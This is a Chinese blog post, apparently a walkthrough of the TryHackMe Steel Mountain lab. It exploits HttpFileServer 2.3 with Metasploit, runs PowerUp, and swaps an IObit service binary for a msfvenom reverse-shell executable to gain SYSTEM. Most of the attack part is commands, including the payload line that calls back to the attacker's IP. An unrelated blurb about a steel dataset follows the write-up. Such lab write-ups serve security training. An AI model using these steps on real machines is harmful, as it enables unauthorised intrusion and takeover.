tryhackme Steel Mountain渗透测试

对目标进行信息收集

nmap扫一下

访问一下80端口和8080端口

Who is the employee of the month?   //谁是本月最佳员工?

Take a look at the other web server. What file server is running?

  //查看其他网络服务器。什么文件服务器正在运行?

谷歌搜索HttpFileServer 2.3

获取shell

用msf搜索HttpFileServer

使用 Metasploit 获取初始 shell

use 0

show options

set rhost 10.10.109.202

set RPORT 8080

set lhost 10.11.63.209 

run    运行

获取shell后查找user flag 

search -f *.txt

找到user.txt,使用cat 命令查看,不知为啥我打不开,直接用shell查看了

为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - PowerUp 的目标是 成为依赖错误配置的常见 Windows 权限升级向量的交换所。 下载脚本 https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

使用 Metasploit 中的upload 命令上传脚本,要使用 Meterpreter 执行此操作,在 meterpreter 中输入 load powershell:

输入 powershell_shell 进入 powershell:

输入以下命令来运行 PowerUp Powershell 脚本: Import-Module .\PowerUp.ps1,然后

Invoke-AllChecks

注意设置为 true 的 CanRestart 选项

msfvenom可用于生成反向shell的payload并将其输出为windows可执行文件,我们用msfvenom来生成一个和之前的应用程序同名的恶意应用程序:

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.63.209 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
 

然后可以通过 meterpreter shell 将其上传到目标机器:

upload ASCService.exe

进入普通的windows shell界面,我们先停止合法的服务运行,然后用恶意的二进制程序替换正常的同名应用程序文件:

shell

sc stop AdvancedSystemCareService9

copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

重启服务前,先在攻击机上监听

然后重启服务

sc start AdvancedSystemCareService9

成功获取system 权限

最后在c:\Users\Administrator\Desktop找到flag

  • 35
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Severstal Steel数据集是俄罗斯Severstal公司公开的一个数据集,包含了大量关于钢铁生产过程的信息。这个数据集主要用于机器学习和数据分析领域的研究和实践。 Severstal Steel数据集的特点是数据的多样性和数量的庞大。它包含了钢铁生产过程中各个环节的数据,例如原材料的成分和质量参数、不同工序的操作参数和设备状态、生产过程中的环境因素等等。通过对这些数据的分析,可以帮助企业了解钢铁生产过程中的关键因素和变量之间的关系,进而提高生产的效率和质量。 同时,Severstal Steel数据集还提供了许多实际问题和挑战,需要我们运用机器学习和数据分析的方法进行解决。例如,可以通过建立模型来预测不同工序中各个参数对最终产品质量的影响,从而优化生产过程。另外,还可以利用这个数据集来进行设备故障检测和维护预测,提前发现设备的问题并采取相应的措施,避免生产中断和损失。 Severstal Steel数据集的应用潜力非常广泛。除了对钢铁生产过程进行分析和优化外,这个数据集还可以应用于建立智能控制系统,实现自动化生产。此外,这个数据集还有助于科学研究和学术交流,在学术界推动相关领域的发展。 总而言之,Severstal Steel数据集是一个宝贵的资源,对于钢铁行业和相关领域的研究和应用具有重要意义。通过深入分析和利用这个数据集,我们可以更好地理解钢铁生产过程,提高生产效率和质量,推动行业的发展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值